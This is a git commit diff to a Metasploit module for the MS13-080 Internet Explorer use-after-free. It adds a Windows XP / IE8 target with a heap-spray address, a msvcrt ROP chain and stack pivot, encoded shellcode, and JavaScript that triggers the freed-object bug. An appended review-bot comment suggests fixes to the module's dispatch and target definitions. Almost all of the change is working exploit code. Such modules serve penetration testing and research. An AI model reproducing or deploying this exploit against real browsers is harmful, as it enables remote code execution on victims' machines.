ADD winxpIE8 exploit for MS13-080

bug/bundler_fix
Rich Lundeen 2014-11-14 17:16:51 -08:00
parent 386a1912e5
commit 17ab0cf96e
1 changed files with 98 additions and 11 deletions


@ -39,7 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Unknown', # Exploit in the wild first spotted in Japan 'Unknown', # Exploit in the wild first spotted in Japan
'sinn3r' # Metasploit (thx binjo for the heads up!) 'sinn3r', # Metasploit (thx binjo for the heads up!)
'Rich Lundeen' # IE8 windows xp
], ],
'References' => 'References' =>
[ [
@ -53,16 +54,29 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'BrowserRequirements' => 'BrowserRequirements' =>
{ {
:source => /script/i, :source => /script/i
:os_name => OperatingSystems::WINDOWS,
:ua_name => HttpClients::IE,
:ua_ver => "9.0",
:os_flavor => "7",
:office => /2007|2010/
}, },
'Targets' => 'Targets' =>
[ [
[ 'Automatic', {} ] [ 'Automatic', {} ],
[
'Windows 7 with Office 2007|2010',
{
:os_name => /win/i,
:ua_name => OperatingSystems::WINDOWS,
:ua_ver => "9.0",
:os_flavor => "7",
:office => /2007|2010/
}
],
[
'Windows XP with IE 8',
{
:os_name => "Windows XP",
:ua_name => HttpClients::IE,
:ua_ver => "8.0"
}
]
], ],
'Payload' => 'Payload' =>
{ {
@ -116,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote
p p
end end
def get_exploit_html(cli, target_info) def get_exploit_html_ie9(cli, target_info)
gadgets = {} gadgets = {}
case target_info[:office] case target_info[:office]
when '2007' when '2007'
@ -238,9 +252,75 @@ window.onload = function() {
| |
end end
def get_exploit_html_ie8(cli, target_info)
code = payload.encoded
#address containing our heap spray is 0x20302020
spray_addr = "\\u2024\\u2030"
#size to fill after free is 0x50
free_fill = spray_addr + "\\u2424" * (((0x50-1)/2)-2)
rop = [
0x77c3868a, # stack pivot in msvcrt || xchg eax, esp ; rcr dword [ebx-0x75], 0xFFFFFFC1 ; pop ebp ; ret ;
0x20302020 # pointer to stack pivot
].pack("V*")
rop << generate_rop_payload('msvcrt', code, { 'target'=>'WINDOWS XP SP3' }) << code
js_rop = Rex::Text.to_unescape(rop)
%Q|
<html>
<script>
#{js_property_spray}
tt = new Array(30);
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1);
id_1.applyElement(id_0);
id_0.onlosecapture=function(e) {
document.write("");
for(i = 0; i < tt.length; i++) {
tt[i] = document.createElement('div');
tt[i].className ="#{free_fill}";
}
var s = unescape("#{js_rop}");
sprayHeap({shellcode:s});
}
id_0['outerText']="";
id_0.setCapture();
id_1.setCapture();
}
window.onload = function() {
trigger();
}
</script>
|
end
def on_request_exploit(cli, request, target_info) def on_request_exploit(cli, request, target_info)
html = get_exploit_html(cli, target_info) case target_info[:ua_ver]
when "8.0"
html = get_exploit_html_ie8(cli, target_info)
when "9.0"
html = get_exploit_html_ie9(cli, target_info)
end
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
end end
end end
@ -258,6 +338,13 @@ hxds.dll (Microsoft® Help Data Services Module)
FileVersion: 2.05.50727.4039 (QFE.050727-4000) FileVersion: 2.05.50727.4039 (QFE.050727-4000)
mshtml.dll mshtml.dll
WinXP IE8 DLL info:
ProductVersion: 8.0.6001.18702
FileVersion: 8.0.6001.18702
FileDescription: Microsoft (R) HTML Viewer
Win7 IE9 DLL info:
ProductVersion: 9.00.8112.16446 ProductVersion: 9.00.8112.16446
FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400) FileVersion: 9.00.8112.16446 (WIN7_IE9_GDR.120517-1400)
FileDescription: Microsoft (R) HTML Viewer FileDescription: Microsoft (R) HTML Viewer
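Review bot: The new `case target_info[:ua_ver]` in `on_request_exploit` has no `else`, so a client whose `ua_ver` is neither "8.0" nor "9.0" leaves `html` nil and falls through to `send_response(cli, nil, ...)`; this matters more now that `BrowserRequirements` has been reduced to `:source => /script/i` and the per-browser checks moved into the individual targets, unless the framework's target matching already rejects such clients upstream, which is not visible in this hunk. Close the dispatch with `else` / `send_not_found(cli)` / `return` so the method never hands a nil body to `send_response`, and prefer the expression form `html = case target_info[:ua_ver] ... end` over assigning inside each branch. The `'Windows 7 with Office 2007|2010'` target sets `:ua_name => OperatingSystems::WINDOWS` while the old `BrowserRequirements` and the new XP target both use `:ua_name => HttpClients::IE`; this looks like a copy error in the key/constant pairing and should be checked against the other target. `get_exploit_html_ie8` also lacks a header comment; a one-liner such as `# Builds the IE8/XP variant of the page; see the mshtml.dll version block at the end of the file.` would match the style of the surrounding methods.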